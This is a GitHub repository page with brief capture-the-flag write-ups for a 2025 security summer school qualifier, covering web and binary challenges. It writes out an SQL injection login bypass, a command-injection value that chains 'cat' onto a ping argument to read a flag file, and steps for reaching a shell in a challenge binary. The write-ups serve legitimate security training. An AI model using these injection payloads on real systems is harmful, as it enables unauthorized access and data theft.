https://github.com/ahossu/sss_qualifiers_v12

The write-ups for the preselection exam of the SSS Security Summer School at UNSTB, Romania, 2025 Edition.
https://github.com/ahossu/sss_qualifiers_v12

binary-exploitation ctf ctf-challenges ctf-platform ctf-writeups cyber-security cybersecurity pwn pwntools reverse-engineering web web-security

Last synced: 11 months ago
JSON representation

The write-ups for the preselection exam of the SSS Security Summer School at UNSTB, Romania, 2025 Edition.

• Host: GitHub
• URL: https://github.com/ahossu/sss_qualifiers_v12
• Owner: ahossu
• Created: 2025-04-19T21:46:23.000Z (about 1 year ago)
• Default Branch: main
• Last Pushed: 2025-04-19T22:20:00.000Z (about 1 year ago)
• Last Synced: 2025-07-01T09:05:30.865Z (11 months ago)
• Topics: binary-exploitation, ctf, ctf-challenges, ctf-platform, ctf-writeups, cyber-security, cybersecurity, pwn, pwntools, reverse-engineering, web, web-security
• Language: C
• Homepage: https://security.cs.pub.ro/summer-school/wiki/
• Size: 17.6 KB
• Stars: 0
• Watchers: 1
• Forks: 0
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

          
# SSS_Qualifiers_v12

##### 2025 Edition

- **Web: Qualifiers: Sequel Pro**  

`we use SQL Injection for this as the title suggests`  

 `user: admin`  

 `pass: ' OR '1' = '1`  

`the secret appears`

- **Web: Qualifiers: Cake**  

`we change the value of the FLAG cookie in applepie`  

`we refresh and we see the cookie updated`  

`it is containing the flag`

- **Web: Qualifiers: Welcome**  

`we look at the source code`  

`first part in:`  

 `/static/css/main.css`  

`second part in:`  

 `
svyr_
`  

`third part in:`  

 `/static/hidden.js?v=`  

`forth part in:`  

 `/static/logo.png`


- **Web: Qualifiers: In Your Face**  

`we look at the source code`  

``  

`we apply base64 on this string`

- **Web: Qualifiers: IP Destroyer**  

`simple command injection to cat the flag.txt`  

`after searching in multiple the directories we find the flag inside /home/ctf/flag`  

`so the input to retrieve the flag is: -c 0 8.8.8.8; cat /home/ctf/flag`

- **Binary: Qualifiers: Black Hole**  

`opened it in IDA`  

`we see that the flag is printed in /dev/null and it is impossible to retrieve it from that address`  

`we use gdb to see the flag before it is written in that file`  

`gdb ./black_hole`  

`gef➤  break fwrite`  

`gef➤  run`  

`gef➤  x/s $rdi`  

`0x602480:       "SSS{the_[REDACTED]_see}"`

- **Binary: Qualifiers: One by One**  

`opened it in Ghidra and than we extract`  

`part20 64h; part0 53h; part24 6Fh; part18 6Fh; part3 7Bh; part27 7Dh; part11 6Fh; part13 5Fh; part23 6Ch; part12 66h; part14 74h; part21 5Fh; part9 70h; part26 6Bh; part17 5Fh; part25 63h; part15 68h; part6 63h; part7 68h; part22 62h; part2 53h; part8 69h; part5 5Fh; part19 6Ch; part4 61h; part16 65h; part1 53h; part10 5Fh`  

`we order them and than we convert them from base64`

- **Binary: Qualifiers: Not Backdoor**  

`the file not_backdoor.exe is a POSIX tar archive (GNU)`  

`we extract the not_backdoor than we analyse the code in IDA`  

`we use the following script to try all XOR possibilities in the function sub_4006B6`  

`orig = [60, 60, 60, 20, 31, 29, 92, 27, 27, 22, 48, 12, 95, 1, 25, 0, 3, 26, 27, 10, 11, 48, 9, 3, 91, 8, 18, 111]`  

`for key in range(256):`  

 `decoded = ''.join(chr(b ^ key) for b in orig)`  

 `print(key, decoded)`  

`there was one result that matched the format starting with SSS and was the flag`

- **Binary: Qualifiers: Mirror Me**  

`opened it in IDA`  

`in max_mirror() function the output is 906609`  

`we choose 2 numbers with the product 906609: 913 and 993, so we can get to system("/bin/sh");`  

`then we search for the flag in the system and we find it in ./home/ctf/flag`

- **Binary: Qualifiers: Pinpoint**  

`opened it in IDA`  

`.data:0000000000601058 v    dd 53535353h`  

`this is the value we need to modify`  

`1398297427 = 0x53585353`  

`initially v is 0x53535353`  

`the four bytes are: at address 0x601058 is 0x53, at address 0x601059 is 0x53, at address 0x60105A is 0x53, at address 0x60105B is 0x53`  

`the only diff between the init value (0x53535353) and the target (0x53585353) is in the third byte (offset 2)`  

`we only need to change that byte`  

`offset 2 so we have to modify at 0x601058 + 2 = 0x60105A`  

`we must change it from 0x53 (83 decimal) to 0x58 (88 decimal)`  

`0x60105A = 6295642`  

`so the inputs are 6295642 and 88`  

`then we search for the flag in the system and we find it in ./home/ctf/flag`

- **Binary: Qualifiers: The Talker**  

`*(_DWORD *)&s.sa_data[2] = htonl(0x7F000001u); -> sends to localhost`  

`*(_WORD *)s.sa_data = htons(4444u); -> sends at port 4444`  

`sleep(10u); -> each 10 seconds`  

`read_flag(buf, 128LL) reads ../flag into a buffer`  

`the binary sends to 127.0.0.1:4444 each 10 seconds using sendto()`  

`we login to connect@141.85.224.99 and we use nc -ul 4444 to listen to 4444 port and we receive the flag`